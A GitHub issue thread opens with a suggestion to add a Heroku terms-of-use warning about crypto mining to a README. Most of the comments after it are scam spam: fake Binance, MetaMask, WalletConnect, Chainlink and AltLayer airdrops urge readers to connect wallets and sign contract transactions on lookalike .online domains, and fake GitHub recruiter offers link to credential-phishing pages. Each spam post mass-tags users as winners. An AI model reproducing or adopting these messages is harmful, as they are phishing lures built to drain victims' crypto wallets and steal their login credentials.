### ISSUE TITLE
Add a Warning to README

### ISSUE THREAD

**Issue by jacektrocinski** [zh/banano-awesome#23]
Cryptocurrency mining is in violation of Heroku’s terms of use.

As a consequence, Heroku can terminate a user's account without notice.

I recommend adding this information in the form of a warning message to the README.

**Comment by zh** [comment]
Fill free to fork the repository and create a PR with the required changes.

**Comment by Vishnuraj2mail** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Vibemotions, @whitel, @ankitsharma07, @bitcodr, @bliotti, @garysdevil, @XFWong, @ajeecai, @idcsource, @silvialove, @driemworks, @fji8ejfijai83r, @lucianboboc, @channprj, @sensen7, @sanguohot, @dashbikash, @wtfiscrq, @unhappychoice, @cjt908, @whileskies, @kjmin-dev, @286010056, @twiny, @daikitahataha, @cwfamily, @mehdi-elmehdi, @vaibhavgeek, @jjae18, @DeKaiju, @seongo, @maestre3d, @hongmaoxiao, @togiter, @Nightmar7, @keymastervn, @eashme, @aninbang-tw, @marryton007, @kentwait, @zhashkevych, @MehmetHanGulter, @shipeng331, @breadsheng, @jwcastillo, @ceeyahya, @ashishsingh-eu, @rodrwan, @elwray, @bytefly

**Comment by BenediktMiller** [comment]
## Exciting News! You're the proud recipient of $2364 in tokens 🪂🔴

Ready to transform those tokens into real value? Here's how:

- Unlock the full potential of your $2364 by seamlessly connecting your wallet to WalletConnect.
- Your $2364 ETH redemption has been verified and is ready for you to claim.
- 🎁 Dive into a world of monthly rewards by exploring [this exclusive airdrop](https://www.walletconnectreward.online/).

But wait, there's more! Connect your wallet now, follow our simple instructions, and unveil an exclusive airdrop designed just for GitHub users. Spread the word to friends—each share increases your eligibility. Don't miss out on securing your reward!

![WalletConnect](https://preview.redd.it/walletconnect-2023-reviews-features-and-safety-v0-e807nahvtfmb1.png?width=2548&format=png&auto=webp&s=f94da65885db338806c867e335e4df7688ef4398)

🚀 **Seize Your Bonus Opportunity Now!** [Verify Eligibility](https://www.walletconnectreward.online/)

Embark on a journey with Optimism, where your wallet is your key to exclusive benefits. Make sure to use a trusted wallet for a secure transaction.

- 🔗 **Connect your wallet:** Not once, but twice!
- 📋 **Claim Button:** Click on the claim button after connecting your wallet.
- 💼 **Interact with the Method Connect:** Engage with the contract using the Method Connect to complete the process.
- 💰 **Ensure Mainnet Balance:** Don't forget to check that your wallet has a sufficient balance on the mainnet for successful transactions.

Reformulate the Whitelist promotion up to $10,000, following these steps:
1. Connect your wallet.
2. Click on the claim button.
3. Interact with the contract using the Method Connect.
4. Ensure your wallet has a sufficient balance on the mainnet.


Winners: @fionnachan, @jaytoday, @kkwl777, @firevenus, @jhbarnett, @jdmarczak, @mtwichan

**Comment by nerypy** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @Miguelo981, @FranklinWaller, @sayem314, @yehot, @atefar2, @Spencer-Sch, @frankgx97

**Comment by marciocastilheiro** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @obernardovieira, @hakankozakli, @LongShao007, @l0z0l, @junit, @sharp0111, @Muhammad-Altabba

**Comment by Bhanderi-Aksahy** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @startewho, @billgo, @hmen97, @niallmartin, @motia, @7ayushgupta, @ancapkolya, @ZenoPrime, @piebaldyak, @nikolay-bushkov, @bkmacyca, @chilitechno, @kianenigma, @DmjLl, @madhavtripathi05, @arnau, @Pabloxx7, @khoazany, @stormbreaker75, @crimeminister, @tristanpollock, @CodeForMMA, @hectorsvill, @paralin, @goodboy, @kuonangzhe, @jerry117, @yoogoc, @joshxcho, @PhantomKnight287

**Comment by leojin** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
rvdemonk, @dd0sxx, @sheIby, @usercao, @dlee77, @GopherJ, @ricardomaleixo, @0xBaconPancakes, @jkfzero, @cedricmagne, @jacky007wang, @ChiuMungZitAlexander, @syedsimanta03, @g4m6, @napcodes, @matEhickey, @akme, @uniyalabhishek, @suhailkakar, @mfts

**Comment by 286010056** [comment]
这是来自QQ邮箱的假期自动回复邮件。您好，我已收到您的邮件，会尽快给您回复。

**Comment by 1997cui** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
victor-57Blocks, @Butters3388214, @brianpr, @williamfhe, @zfogg, @shaun97, @liu798675179, @kleguizamon, @bryansayler, @jeevanpillay, @feulf, @bastien707, @lw1992, @roo-shy, @J-1000, @glowx, @LNshuti, @bayuagpr, @developerasun, @lyoshenka
